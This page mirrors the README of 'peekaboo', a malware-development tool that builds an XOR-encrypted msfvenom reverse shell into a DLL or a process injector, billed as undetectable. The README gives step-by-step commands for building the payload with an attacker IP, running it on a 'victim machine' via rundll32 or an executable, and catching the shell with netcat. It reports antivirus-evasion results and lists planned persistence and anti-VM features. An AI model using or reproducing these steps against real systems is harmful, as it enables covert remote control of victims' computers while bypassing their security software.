Cocomelonc Peekaboo Save

Simple undetectable shellcode and code injector launcher example. Inspired by RTO malware development course.

Project README

Peekaboo

Simple undetectable shellcode and code injector launcher example. Inspired by RTO malware development course.

Main logic

XOR encryption and decryption for functions call and main payload - msfvenom reverse shell as example.

Usage

1. DLL

on attacker machine

check your IP:

ip a

attacker machine IP

run python script with flags:

python3 peekaboo.py -l 192.168.56.1 -p 4444 --build 1

run python script

then on victim machine (windows 10 x64):

run on powershell or cmd promt:

rundll32 .\peekaboo.dll, lCiSdbvIAaeZLHFfkUhEcbOy

run on victim machine

check on attacker machine:

check your netcat listener:

check netcat listener

check IP address

2.Injector

on attacker machine:

check attacker ip:

ip a

check IP

run python script on linux (for example process mspaint.exe):

python3 peekaboo.py -l 192.168.56.1 -p 4444 -e mspaint.exe --build 2

run python script

then on victim machine run (windows 10 x64):

.\peekaboo.exe

or click (if -m windows param)

run on victim machine

check on attacker machine:

check your netcat listener:

check netcat listener

3. NT API injector

run python script on linux (for example process mspaint.exe):

python3 peekaboo.py -l 192.168.56.1 -p 4444 -e mspaint.exe -m console --build 3

enc and compile nt

then on victim machine (windows 10 x64):

.\peekaboo.exe

run malware

Issues.

Tested on:

Attacker machines: Kali linux 2020.1, Windows 10 x64
Victim machine: Windows 7 x64, Windows 10 x64
Payload: windows x64 reverse shell from msfvenom
AV Engines: Kaspersky, Windows Defender, Norton Antivirus Plus

virus total result:

02 september 2021

virustotal

https://www.virustotal.com/gui/file/c930b9aeab693d36c68e7bcf6353c7515b8fffc8f9a9233e49e90da49ab5d470/detection

30 december 2021 (NT API injector)

virtustotal 2

https://www.virustotal.com/gui/file/743f50e92c6ef48d6514e0ce2a255165f83afb1ae66deefd68dac50d80748e55/detection

antiscan.me result:

11 january 2022 (NT API injector)

antiscan

https://antiscan.me/scan/new/result?id=rQVfQhoFYgH9

TODO

Compile injector in Kali linux
XOR + AES aes branch
Calling Windows API functions by hash names
Find Kernel32 base via asm style
One python builder
Anti-VM tricks
Persistence via Windows Registry run keys
Replace msfvenom shell to donut payload???

Attention

This tool is a Proof of Concept and is for Educational Purposes Only!!! Author takes no responsibility of any damage you cause

License

MIT

Open Source Agenda is not affiliated with "Cocomelonc Peekaboo" Project. README Source: cocomelonc/peekaboo

Stars

198

Open Issues

Last Commit

1 year ago

Repository

cocomelonc/peekaboo

Open Source Agenda Badge

<a href="https://www.opensourceagenda.com/projects/cocomelonc-peekaboo"><img src="https://www.opensourceagenda.com/projects/cocomelonc-peekaboo/reviews/badge.svg" alt="Open Source Agenda"></a>

Submit Review Review Your Favorite Project

Submit Resource Articles, Courses, Videos

Submit Article Submit a post to our blog

From the blog

Dec 11, 2022

How to Choose Which Programming Language to Learn First?

From the blog

Dec 11, 2022